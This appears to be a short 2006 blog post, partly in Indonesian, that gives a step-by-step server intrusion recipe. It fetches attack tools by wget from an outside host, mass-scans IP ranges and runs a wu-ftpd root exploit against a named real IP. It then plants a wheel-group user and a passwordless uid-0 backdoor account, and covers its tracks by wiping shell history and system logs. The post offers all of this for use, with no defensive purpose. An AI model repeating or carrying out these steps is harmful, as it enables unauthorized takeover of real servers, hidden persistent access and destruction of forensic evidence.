Thursday, January 12, 2006

local explo

shell, dua session
wget xgoogle.tk ftp.tar & xpost.tar
tar -zxvf
cd

xpost
./scan (ip range) ex : ./scan 202.1
./masswu wu-scan.log
if keterangan = You Have Root In 211.240.56.254
then
211.240.56.254 > bisa di jebol

ftp
./awu 211.240.56.254
wait for
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow
if whoami = root
then successfull

adduser
/usr/sbin/adduser buham -g wheel -s /bin/bash -d /home/buham
passwd buham
if
Changing password for user buham
passwd: all authentication tokens updated successfully
then
user successfull

get acces root

/usr/sbin/useradd crit -u 0 -d /
passwd -d crit

Done ?
covering tracks...

cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

ctrl + d

No comments:

Mac-On-Linux Divider Bar